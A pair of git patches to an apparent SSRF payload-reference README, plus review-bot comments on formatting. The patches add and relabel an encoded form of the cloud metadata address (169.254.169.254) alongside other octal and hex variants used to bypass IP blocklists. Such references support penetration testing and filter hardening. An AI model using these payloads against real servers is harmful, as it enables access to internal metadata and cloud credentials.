From 3c441669d81f187edd5be0884eb42238ceef6ead Mon Sep 17 00:00:00 2001 From: Aj Dumanhug Date: Sun, 13 Mar 2022 01:30:37 +0800 Subject: [PATCH 1/2] Update README.md --- Server Side Request Forgery/README.md | 2 ++ 1 file changed, 2 insertions(+) diff --git a/Server Side Request Forgery/README.md b/Server Side Request Forgery/README.md index ed8dd5ca..bb0d667e 100644 --- a/Server Side Request Forgery/README.md +++ b/Server Side Request Forgery/README.md @@ -573,6 +573,7 @@ http://0xA9FEA9FE/ Dotless hexadecimal http://0x41414141A9FEA9FE/ Dotless hexadecimal with overflow http://0251.0376.0251.0376/ Dotted octal http://0251.00376.000251.0000376/ Dotted octal with padding +http://0251.254.169.254 Encode 1 octet of the IP address or 2 or 3 (Just don't encode all) ``` More urls to include @@ -856,3 +857,4 @@ More info: https://rancher.com/docs/rancher/v1.6/en/rancher-services/metadata-se - [SSRF’s up! Real World Server-Side Request Forgery (SSRF) - shorebreaksecurity - 2019](https://www.shorebreaksecurity.com/blog/ssrfs-up-real-world-server-side-request-forgery-ssrf/) - [challenge 1: COME OUT, COME OUT, WHEREVER YOU ARE!](https://www.kieranclaessens.be/cscbe-web-2018.html) - [Attacking Url's in JAVA](https://blog.pwnl0rd.me/post/lfi-netdoc-file-java/) +- [SSRF: Don't encode entire IP](https://twitter.com/thedawgyg/status/1224547692967342080) From 8d609b1460c68fa7f4c298688684e8f0d4b791f8 Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Tue, 6 Sep 2022 23:15:12 +0200 Subject: [PATCH 2/2] Update README.md --- Server Side Request Forgery/README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/Server Side Request Forgery/README.md b/Server Side Request Forgery/README.md index bb0d667e..3a885342 100644 --- a/Server Side Request Forgery/README.md +++ b/Server Side Request Forgery/README.md 
@@ -573,7 +573,7 @@ http://0xA9FEA9FE/ Dotless hexadecimal http://0x41414141A9FEA9FE/ Dotless hexadecimal with overflow http://0251.0376.0251.0376/ Dotted octal http://0251.00376.000251.0000376/ Dotted octal with padding -http://0251.254.169.254 Encode 1 octet of the IP address or 2 or 3 (Just don't encode all) +http://0251.254.169.254 Mixed encoding (dotted octal + dotted decimal) ``` More urls to include
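Review bot: in the first hunk of PATCH 1/2 (@@ -573,6 +573,7), the added entry `http://0251.254.169.254` has no trailing slash, while the four context entries around it all end in `/`, and its description is an instruction ("Just don't encode all") rather than a short label such as "Dotted octal" on the lines above. Suggest adding the slash and giving the row a label in the same style that says which octet is octal and which are decimal, so the row reads like the rest of the block.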
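Review bot: in the second hunk of PATCH 1/2 (@@ -856,3 +857,4), the new reference `[SSRF: Don't encode entire IP]` links to a tweet and gives no author or year, unlike the `shorebreaksecurity - 2019` entry a few lines above it in the same list. Add the author handle and year to the link text. Since the new payload row relies on this single source, consider also linking an archived copy so the reference survives if the tweet is removed.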
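Review bot: in PATCH 2/2 (@@ -573,7 +573,7), the reworded line still has no trailing slash after `http://0251.254.169.254`, so it stays the only entry in this block that differs from the `/`-terminated form of the lines above it. The new label "Mixed encoding (dotted octal + dotted decimal)" also drops what the previous text said about encoding one, two or three octets. If that is still the point, state it in the label (for example, which octets are octal in this row), and give the commit a subject more specific than "Update README.md" so the history shows this was a wording fix.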